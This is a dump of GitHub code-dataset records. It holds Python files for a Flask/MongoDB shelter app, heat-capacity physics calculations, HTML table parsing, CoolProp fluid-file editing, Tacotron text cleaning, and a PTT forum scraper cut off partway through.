"file_ext": "py", "file_size_in_byte": 9843, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 24, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.hub.load_state_dict_from_url", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.hub", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 23, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 44, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "call"}, {"api_name": "decord.VideoReader", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 105, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 108, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 124, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 139, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 156, "usage_type": "attribute"}, {"api_name": "omegaconf.OmegaConf.load", "line_number": 164, "usage_type": "call"}, {"api_name": "omegaconf.OmegaConf", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 168, "usage_type": "call"}, {"api_name": "models.__dict__", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 185, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 186, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 187, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 188, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 189, "usage_type": "call"}, {"api_name": "pytorch_grad_cam.ActivationsAndGradients", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.enable_grad", "line_number": 206, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 217, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 217, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 219, "usage_type": "call"}, {"api_name": "cv2.applyColorMap", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 220, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 235, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 235, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 236, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 237, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 237, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 239, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 239, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 149, "usage_type": "call"}]}
+{"seq_id": "69926018013", "text": "from flask import Flask, render_template, request, redirect, url_for\nimport os\nimport pymongo\nfrom dotenv import load_dotenv\n\n# to use ObjectId to access an item in mongo db\nfrom bson.objectid import ObjectId\n\n# To allow the use of .env file\nload_dotenv()\n\napp = Flask(__name__)\n\n# this is to retrieve info/setting from .\n# env file via the arg in os.environ.get()\nMONGO_URI = os.environ.get('MONGO_URI')\n\nDB_NAME = 'tgc10_new_shelter'\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[DB_NAME]\n\n\n@app.route('/animals')\ndef show_all_animals():\n animals = db.animals.find()\n return render_template('show_animals.template.html',\n htmlanimals=animals)\n\n\n@app.route('/animals/create')\ndef show_create_animals():\n return render_template('create_animals.template.html')\n\n\n@app.route('/animals/create', methods=['POST'])\ndef process_create_animals():\n name = request.form.get('name')\n breed = request.form.get('breed')\n age = request.form.get('age')\n animal_type = request.form.get('type')\n\n # insert only ONE new document\n db.animals.insert_one(\n {\n \"name\": name,\n \"age\": age,\n \"breed\": breed,\n \"type\": animal_type\n }\n )\n\n return redirect(url_for('show_all_animals'))\n\n# this route is to get the id to be deleted\n# and prompt the user for confirmation\n\n\n@app.route('/animals//delete')\ndef delete_animal(animal_id):\n animal = db.animals.find_one(\n {\n \"_id\": ObjectId(animal_id)\n }\n )\n\n return render_template('confirm_delete_animal.template.html',\n animal_to_delete=animal)\n\n\n@app.route('/animals//delete', methods=[\"POST\"])\ndef process_delete_animal(animal_id):\n db.animals.remove({\n \"_id\": ObjectId(animal_id)\n })\n\n return redirect(url_for('show_all_animals'))\n\n\n@app.route('/animals//update')\ndef show_update_animal(animal_id):\n animal_to_edit = db.animals.find_one(\n {\n \"_id\": ObjectId(animal_id)\n }\n )\n\n return render_template('show_update_animal.template.html',\n html_animal_to_edit=animal_to_edit)\n\n\n@app.route('/animals//update', methods=['POST'])\ndef process_update_animals(animal_id):\n db.animals.update_one(\n {\n \"_id\": ObjectId(animal_id)\n },\n {\n \"$set\": request.form\n }\n )\n\n return redirect(url_for('show_all_animals'))\n\n\nif __name__ == '__main__':\n app.run(host=os.environ.get('IP'), port=os.environ.get('PORT'),\n debug=True)\n", "repo_name": "simplyedwin/tgc10-flask-mongodb", "sub_path": "shelter/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 16, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 37, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 52, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 76, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 102, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 106, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 106, "usage_type": "attribute"}]}
+{"seq_id": "7646758848", "text": "#! /usr/bin/python\n\n#import numpy as np\n#import re\n\n#from scipy.optimize import leastsq\n#from scipy import constants\n#import matplotlib.pyplot as plt\nimport numpy as np\nimport collections\nimport re\n\nclass hc_dos:\n \"\"\"to to: if input dimensions do not match, e.g. T is Nx1 and B is Mx1, understand it as mx1 per element of T\"\"\"\n def __init__(self, histfile = None, expfile = None, datasource = 'PPMS'):\n \"\"\"\n Utility class for calculating the heat capacity of a gapped triplonic (Schottky-term) system based on \n - a given density of states\n - a multilevel-system with given energies\n \n and of a phononic system based on the Einstein and Debye-approximation\n Initializes the DOS-histogram by pickle-loading it from path. Later, we will try to include simple\n string files, if needed\n \n The DoS has to be given as a function of energy in meV\n\n The heat capacity is calculated in J per mole (Joule per 6.022e23 particles/atoms/unit cell)\n Input:\n\n path_to_dos_hist: String, leading to the histogram file\n \n \n \"\"\"\n from scipy import constants \n\n self.fac_meVtoK = constants.e * 1e-3 / constants.k #factor to get energies in K from energies in meV\n self.muB = constants.physical_constants['Bohr magneton in K/T'][0] #muB divided by kB in K/T\n self.kmol = constants.k * constants.N_A\n if not histfile == None:\n self.load_dos(histfile)\n if not expfile == None:\n self.load_data(expfile)\n\n def load_dos(self, path):\n \"\"\"loading the dos histogram, expects plain text\n 'energies'\n energies\n 'count'\n count\n \"\"\"\n #load the histogram\n with open(path) as datei:\n dos_hist = []\n for line in datei:\n if 'energies' in line or 'count' in line:\n dos_hist.append(np.array([]))\n else:\n dos_hist[-1] = np.append(dos_hist[-1], float(line))\n\n #find the lower and upper bound of the unperturbed dos\n self.Emin_raw, self.Emax_raw = dos_hist[0].min() * self.fac_meVtoK, dos_hist[0].max() * self.fac_meVtoK \n #get the energy spacing\n self.deltaE = (dos_hist[0][1:] - dos_hist[0][:-1]).mean() * self.fac_meVtoK \n #get the distribution\n self.dos_pdf = np.asarray(dos_hist[1], dtype = float)\n #and normalize it\n self.dos_pdf /= self.dos_pdf.sum()\n self.Emin = self.Emin_raw\n self.Emax = self.Emax_raw\n\n def load_data(self, path, datasource = 'PPMS', Nmol = 1, mass =1, method = 'replace'):\n \"\"\" takes the files in path and loads the data from there\n INPUT:\n path: string or iterable list of strings, not nested\n \"\"\"\n# pdb.set_trace()\n if isinstance(path, basestring):\n path = np.array([path])\n for p in path:\n try:\n data = np.append(data, np.atleast_2d(self._load_data_single(p)), axis = 0)\n except:\n data = np.atleast_2d(self._load_data_single(p))\n data[:,2] /= Nmol #convert from Joule per K to Joule per mole and K\n\n if method == 'replace':\n self.T_exp = data[:,1]\n self.B_exp = data[:,0]\n self.C_exp = data[:,2] \n\n elif method == 'add':\n self.T_exp = np.append(self.T_exp, data[:,1])\n self.B_exp = np.append(self.B_exp, data[:,0])\n self.C_exp = np.append(self.C_exp, data[:,2])\n\n def _load_data_single(self, path, datasource = 'PPMS'):\n \"\"\"loads the data from one file\n INPUT:\n path: string, path to file\n OUTPUT:\n data: N x 3 array with\n data[:,0] : field in T\n data[:,1] : temperature in K\n data[:,2] : heat capacity in J/K\n \"\"\"\n C_factors = {'\\xb5J/K' : 1e-6, #microJoule per Kelvin\n }\n if datasource == 'PPMS':\n #we expect a sample heat capacity in microJoule per K\n with open(path, 'r') as f:\n for line in f:\n if 'Time Stamp' in line:\n self.unit = line.split(',')[9].split()[-1].strip('()')\n break\n\n with open(path, 'r') as f:\n lines = (line for line in f if not re.search('[a-zA-DF-Z]', line))\n data = np.genfromtxt(lines, delimiter = ',', usecols = (5, 4, 9))\n data[:,0] /= 1e4 #convert from Oe to T\n data[:,2] *= C_factors[self.unit] #convert from microJoule to Joule\n return data\n\n def _dos_raw(self, energy, S):\n \"\"\"returns the density of states for states with a total spin of S\n Input:\n energy: float or array of floats, energy at which the DoS should be given\n S int or array of ints, total spin of the state to be examined\n \n Output:\n dos: array of float, density of states\n \"\"\"\n energy = np.atleast_1d(energy)\n S = np.atleast_1d(S)\n# else: #if energy is a list or an array etc. (iterable) \n energy = np.atleast_1d(energy) #make sure the energy is an array\n dos = np.zeros(energy.shape[0])\n #the positions in the dos-histogram are the differences of energy and minimum energy in units of deltaE\n maske = np.where((S==0) & (energy < self.deltaE/2) & (energy >- self.deltaE/2)) #S=0 and energies close to zero\n dos[maske] = 1.0 #where S=0, the dos is 1.0 close to zero (N states for N particles) (also outside the band)\n\n# pdb.set_trace()\n maske = np.where((S==1) & (energy > self.Emin) & (energy < self.Emax)) #all energies with S=1 in the band\n indices = np.asarray((energy - self.Emin) / self.deltaE, dtype=int) #\n dos[maske] = self.dos_pdf[indices[maske]] #the dos is given by the values of the histogram at the \"indices\"-positions\n\n return dos\n\n def dos(self, energy, spinstate, field, g=1.94):\n \"\"\"returns the density of states for the given energy, field, and involved spinstates\n Input:\n energy: n x 1 float array of energies, unit: K (energy divided by kB)\n spinstate: n x 4 x 2 float array of involved spin states S,m\n field: n x 1 float array of fields, unit: T\n\n Output:\n dos: n x 1 array, dtype=float, unit: 1/K\n \"\"\"\n\n n = energy.shape[0]\n energy = np.atleast_1d(energy)\n energy = energy.reshape(n, 1) #build a (n, 1)-array as it may be a (n,) array \n energy = np.tile(energy, spinstate.shape[1])\n\n field = np.atleast_1d(field)\n field = field.reshape(field.shape[0], 1)\n field = np.tile(field, spinstate.shape[1])\n \n energy = energy + spinstate[:, :, 1] * g * self.muB * field #transform the energy back to the fieldless case for each m\n\n S = spinstate[:,:,0].reshape(energy.shape[0] * energy.shape[1]) #1-dim array of the first spin quantum number\n energy = energy.reshape(energy.shape[0] * energy.shape[1]) #convert it to a 1-dim array\n \n dos = self._dos_raw(energy, S)\n dos = dos.reshape(n, dos.shape[0]/n)\n dos = dos.sum(axis=1)\n return dos\n \n def C_el_dos(self, B, T, g = 1.94):\n \"\"\"\n calculates the specific heat of the system for the given fields and temperatures\n Input:\n B: n x 1 array, dtype = float, unit: T (Tesla)\n T: n x 1 array, dtype = float, unit: K (Kelvin)\n \"\"\"\n# pdb.set_trace()\n Emin = min(0, self.Emin - g * self.muB * max(B)) #get the global minimum of the energy for all fields\n Emax = self.Emax + g * self.muB * max(B) #get the global maximum of the energy for all fields\n \n E = np.arange(Emin, Emax, self.deltaE)\n N = E.shape[0]\n e = np.tile(E, B.shape[0])\n\n n = B.shape[0]\n b = np.repeat(B, N)\n\n d = np.array([[0, 0], [1, 1], [1, 0], [1, -1]])\n d = d.reshape(1, d.shape[0], d.shape[1])\n d = np.tile(d, (b.shape[0], 1, 1))\n\n# return E.shape, B.shape, d.shape\n dos = self.dos(e, d, b) \n dos = dos.reshape(n,N).T \n\n E = E.reshape(E.shape[0], 1)\n\n bes_fak = - np.outer(E, 1/T)\n bes_fak = np.exp(bes_fak)\n\n A = dos * E**2 * bes_fak\n A = A.sum(axis = 0)\n\n B = dos * E * bes_fak\n B = B.sum(axis = 0)\n\n Z = dos * bes_fak\n Z = Z.sum(axis = 0)\n \n C = (A*Z - B**2) / Z**2\n\n return self.kmol * C/T**2\n \n def c_level(self, e, m, T, B = np.array([0])):\n \"\"\"\n calculates the heat capacity of a multi-level system with a Zeeman-splitting\n \n input:\n e: M x 1 - array of energies for the level, given in units of K (E/kB), \n d: M x 1 - array of degeneracies of the levels\n m: M x 1 - array of magnetic moments of the levels (-1, 1, 1)\n \n T: N x 1 - array of sample temperatures in K\n B: N x 1 - array of applied magnetic fields in Tesla\n \"\"\"\n g = 1.94 #lande g-factor\n# muB = constants.physical_constants['Bohr magneton in K/T'][0] #muB devided by kB\n e = np.asarray(e, dtype = float) #making sure that the energies are a floating point array\n T = np.asarray(T, dtype = float) #making sure that the temperatures are a floating point array\n B = np.asarray(B, dtype = float) #making sure that the fields are a floating point array\n B = g * self.muB * B \n energies = e[:, np.newaxis] * np.ones((e.shape[0], B.shape[0])) #initialize the energies for each measurement point\n energies -= np.outer(m, B) \n boltz_fac = np.exp( -energies / T )\n \n A = energies * energies * boltz_fac\n A = A.sum(axis=0)\n \n B = energies * boltz_fac\n B = B.sum(axis=0)\n \n Z = boltz_fac\n Z = Z.sum(axis=0)\n \n return self.kmol * (A * Z - B * B) / (Z * Z) / T**2\n\n def c_schottky(self, T, deltaE):\n \"\"\"convenience function to be able to simulate a 2-level system without to much input\"\"\"\n e = np.array([0, deltaE])\n m = np.array([0, 0])\n return self.c_level(e, m, T)\n\n def C_ph_Debye(self, T, T_D):\n T = np.asarray(T, dtype=float)\n if isinstance(T, (collections.Sequence, np.ndarray)):\n stepsize = 1e-3\n c = np.zeros(T.shape[0])\n for index, t in enumerate(T):\n x = np.arange(1e-3, T_D / t, stepsize)\n y = x**4 * np.exp(x) / (np.exp(x) - 1)**2\n c[index] = 9 * sum(y) * stepsize * ( t / T_D )**3\n else:\n x = np.arange(1e-3, T_D / T, 1e-3)\n y = x**4 * np.exp(x) / (np.exp(x) - 1)**2\n c = 9 * sum(y) * (x[1:]-x[:-1]).mean() * ( T / T_D )**3\n return c * self.kmol\n \n def C_ph_Einstein(self, T, T_E):\n T = np.asarray(T, dtype=float)\n return 3 * self.kmol * (T_E / T)**2 * np.exp(T_E/T) / (np.exp(T_E/T) - 1)**2\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "henrikgrundmann/heatcapacity", "sub_path": "hc_dos.py", "file_name": "hc_dos.py", "file_ext": "py", "file_size_in_byte": 11195, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "scipy.constants.e", "line_number": 36, "usage_type": "attribute"}, {"api_name": "scipy.constants", "line_number": 36, "usage_type": "name"}, {"api_name": "scipy.constants.k", "line_number": 36, "usage_type": "attribute"}, {"api_name": "scipy.constants.physical_constants", "line_number": 37, "usage_type": "attribute"}, {"api_name": "scipy.constants", "line_number": 37, "usage_type": "name"}, {"api_name": "scipy.constants.k", "line_number": 38, "usage_type": "attribute"}, {"api_name": "scipy.constants", "line_number": 38, "usage_type": "name"}, {"api_name": "scipy.constants.N_A", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 94, "usage_type": "call"}, {"api_name": "re.search", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 240, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 262, "usage_type": "call"}, {"api_name": "collections.Sequence", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 263, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 278, "usage_type": "call"}]}
+{"seq_id": "70997525850", "text": "from bs4 import BeautifulSoup\r\n\r\nwith open(\"C:/Users/john_j_o'neill/DataRepresentation/week03-webScrapping/carviewer02.html\") as fp:\r\n soup = BeautifulSoup(fp,'html.parser')\r\n\r\n\r\n#print (soup.tr)\r\n#print all the rows under each tr\r\nrows= soup.findAll('tr')\r\nfor row in rows:\r\n# print(row)\r\n dataList =[]\r\n cols =row.findAll(\"td\")\r\n for col in cols:\r\n dataList.append(col.text)\r\n print(dataList)\r\n", "repo_name": "JohnONeillGMIT/dataRepresentation", "sub_path": "week03-webScrapping/PY03-readOurFile.py", "file_name": "PY03-readOurFile.py", "file_ext": "py", "file_size_in_byte": 421, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "38302980635", "text": "#!/Users/ian/anaconda/bin/python\n\nimport json, glob, CoolProp\n\nfor fluid in glob.glob('../fluids/*.json'):\n with open(fluid, 'r') as fp:\n jj = json.load(fp)\n\n pL = jj['ANCILLARIES'].pop('pL')\n pV = jj['ANCILLARIES'].pop('pV')\n # Keep the one with the lower error\n if pL['max_abserror_percentage'] < pV['max_abserror_percentage']:\n pS = pL\n else:\n pS = pV\n\n pseudo_pure = jj['EOS'][0]['pseudo_pure']\n if pseudo_pure:\n print('-----------------PSEUDO (SKIPPING !!!) %s' % fluid)\n else:\n print(fluid)\n jj['ANCILLARIES']['pS'] = pS\n with open(fluid, 'w') as fp:\n json.dump(jj, fp)\n", "repo_name": "CoolProp/CoolProp", "sub_path": "dev/scripts/replace_ancillaries.py", "file_name": "replace_ancillaries.py", "file_ext": "py", "file_size_in_byte": 663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 664, "dataset": "github-code", "pt": "32", "api": [{"api_name": "glob.glob", "line_number": 5, "usage_type": "call"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "25771865712", "text": "import re\nfrom unidecode import unidecode\nfrom pykakasi import kakasi\nfrom jamo import hangul_to_jamo\nfrom .numbers import normalize_numbers\n\n\n_kks = kakasi()\n_kks.setMode('H', 'a')\n_kks.setMode('K', 'a')\n_kks.setMode('J', 'a')\n_kks.setMode('E', 'a')\n_kks.setMode('s', True)\n_conv = _kks.getConverter()\n\n#White space\n_whitespace_re = re.compile(r'\\s+')\n\n#訳語処理のためのリスト\n_abbreviations = [(re.compile('\\\\b%s\\\\.' % x[0], re.IGNORECASE), x[1]) for x in [\n ('mrs', 'misess'),\n ('mr', 'mister'),\n ('dr', 'doctor'),\n ('st', 'saint'),\n ('co', 'company'),\n ('jr', 'junior'),\n ('maj', 'major'),\n ('gen', 'general'),\n ('drs', 'doctors'),\n ('rev', 'reverend'),\n ('lt', 'lieutenant'),\n ('hon', 'honorable'),\n ('sgt', 'sergeant'),\n ('capt', 'captain'),\n ('esq', 'esquire'),\n ('ltd', 'limited'),\n ('col', 'colonel'),\n ('ft', 'fort'),\n]]\n\ndef replace_abbreviations(text):\n for abbr, replacement in _abbreviations:\n text = re.sub(abbr, replacement, text)\n return text\n\ndef expand_numbers(text):\n return normalize_numbers(text)\n\ndef lowercase(text):\n return text.lower()\n\ndef collapse_whitespace(text):\n return re.sub(_whitespace_re, ' ', text)\n\ndef convert_to_ascii(text):\n return unidecode(text)\n\ndef english_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = expand_numbers(text)\n text = replace_abbreviations(text)\n text = collapse_whitespace(text)\n return text\n\ndef japanese_cleaners(text):\n text = _conv.do(text)\n text = lowercase(text)\n text = expand_numbers(text)\n text = collapse_whitespace(text)\n return text\n\ndef korean_cleaners(text):\n text = ''.join(list(hangul_to_jamo(text)))\n return text\n\ndef transliteration_cleaners(text):\n text = convert_to_ascii(text)\n text = lowercase(text)\n text = collapse_whitespace(text)\n return text", "repo_name": "kgy94329/Tacotorn", "sub_path": "Tacotron/text/text_cleaner.py", "file_name": "text_cleaner.py", "file_ext": "py", "file_size_in_byte": 1866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pykakasi.kakasi", "line_number": 8, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 20, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 20, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 43, "usage_type": "call"}, {"api_name": "numbers.normalize_numbers", "line_number": 47, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 53, "usage_type": "call"}, {"api_name": "unidecode.unidecode", "line_number": 56, "usage_type": "call"}, {"api_name": "jamo.hangul_to_jamo", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "73819110812", "text": "import os\nimport requests\nfrom bs4 import BeautifulSoup\n\nresource_path = r'./res_gossiping'\nif not os.path.exists(resource_path):\n os.mkdir(resource_path)\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'\n}\nss = requests.session()\nss.cookies['over18'] = '1'\n\nurl = 'https://www.ptt.cc/bbs/Gossiping/index.html'\n\nn = 30\nfor i in range(0, n):\n res = ss.get(url, headers=headers)\n soup = BeautifulSoup(res.text, 'html.parser')\n article_title_html = soup.select('div[class=\"title\"]')\n\n for each_article in article_title_html:\n try:\n print(each_article.a.text)\n print('https://www.ptt.cc' + each_article.a['href'])\n\n article_url = 'https://www.ptt.cc' + each_article.a['href']\n article_text = each_article.a.text\n article_res = ss.get(article_url, headers=headers)\n article_soup = BeautifulSoup(article_res.text, 'html.parser')\n\n push_up = 0\n push_down = 0\n score = 0\n author = ''\n title = ''\n datetime = ''\n article_content = article_soup.select('div#main-content')[0].text.split(\n '--'\n )[0]\n push_info_list = article_soup.select('div[class=\"push\"] span')\n for info in push_info_list:\n if '推' in info.text:\n push_up += 1\n if '噓' in info.text:\n push_down += 1\n article_info_list = article_soup.select(\n 'div[class=\"article-metaline\"] span'\n )\n for n, info in enumerate(article_info_list):\n if (n + 1) % 6 == 2:\n author = info.text\n if (n + 1) % 6 == 4:\n title = info.text\n if (n + 1) % 6 == 0:\n datetime = info.text\n score = push_up - push_down\n article_content += '\\n---split---\\n'\n article_content += '推: %s\\n' % (push_up)\n article_content += '噓: %s\\n' % (push_down)\n article_content += '分數: %s\\n' % (score)\n article_content += '作者: %s\\n' % (author)\n article_content += '標題: %s\\n' % (title)\n article_content += '時間: %s\\n' % (datetime)\n try:\n new_article_text = article_text\n for iw in 